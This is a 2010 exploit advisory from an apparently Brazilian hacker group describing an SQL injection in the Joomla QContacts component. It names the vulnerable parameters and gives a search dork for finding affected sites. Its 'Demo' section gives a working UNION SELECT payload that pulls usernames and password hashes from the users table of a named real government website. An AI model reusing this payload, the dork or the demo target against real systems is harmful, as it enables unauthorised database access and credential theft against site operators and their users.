Exploit


 ____        _                 _    _       _      
|  _ \      | |               | |  | |     (_)     
| |_) | ___ | |_ ___  ___ ___ | |  | |_ __  ___  __
|  _ < / _ \| __/ _ \/ __/ _ \| |  | | '_ \| \ \/ /
| |_) | (_) | ||  __/ (_| (_) | |__| | | | | |>  < 
|____/ \___/ \__\___|\___\___/ \____/|_| |_|_/_/\_\ 
      ...:::Ajudando povo Unix Like desde 2006:::...




Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability

##################################################################################################
#                                                                                                #
#                                                                                                #
#  [+] Discovered by : _mlk_ (Renan)                                                             #
#                                                                                                #
#  [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs                                            #
#                                                                                                #
#  [+] Homepages :  http://code.google.com/p/bugsec/  <>  http://botecounix.com.br/blog/         #
#                                    http://c0d3rs.wordpress.com/                                #
#                                                                                                #
#  [+] Location : Porto Alegre - RS, Brasil                                                      #
#                        (or Brazil)                                                             #
#                                                                                                #
#                                                                                                #
##################################################################################################
#                                                                                                #
#                                                                                                #
#     [-] Information                                                                            #
#                                                                                                #
#  [?] Script : QContacts                                                                        #
#                                                                                                #
#  [?] FAQ : http://www.latenight-coding.com/joomla-addons/qcontacts.html                        #
#                                                                                                #
#  [?] Versions Tested: 1.0.4 and previous                                                       #
#                                                                                                #
#  [?] Dork/String :  "index.php?option=com_qcontacts" / "com_qcontacts"                         #
#                                                                                                #
#  [?] Date :  12, July 2010                                                                     #
#                                                                                                #
#                                                                                                #
##################################################################################################
#                                                                                                #
#                                                                                                #
#     [*] Parameters vuls :                                                                      #
#                                                                                                #
#        Itemid                                                                                  #
#        id                                                                                      #
#        catid                                                                                   #
#                                                                                                #
#                                                                                                #
##################################################################################################
#                                                                                                #
#                                                                                                #
#     [*] Example :                                                                              #
#                                                                                                #
#        http://localhost/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]                   #
#        http://localhost/[PATH]/index.php?option=com_qcontacts&Itemid=1 [SQL-Inject]            #
#                                                                                                #
#                                                                                                #
##################################################################################################
#                                                                                                #
#                                                                                                #
#     [*] Demo :                                                                                 #
#                                                                                                #
#        http://monoceros.cnj.gov.br/portalcnj/index.php?option=com_qcontacts&&Itemid=-541       #
#        +union+select+concat(id,0x3a,name,0x3a,username,0x3a,password)+from+cms01_users--       #
#                                                                                                #
#                                                                                                #
##################################################################################################
#                                                                                                #
#                                                                                                #
#    [~] Agradecimentos :                                                                        #
#                                                                                                #
#       Deus , Familiares , Amigos e Tricolor Gaúcho (Grêmio) .                                  #
#                                                                                                #
#                                                                                                #
##################################################################################################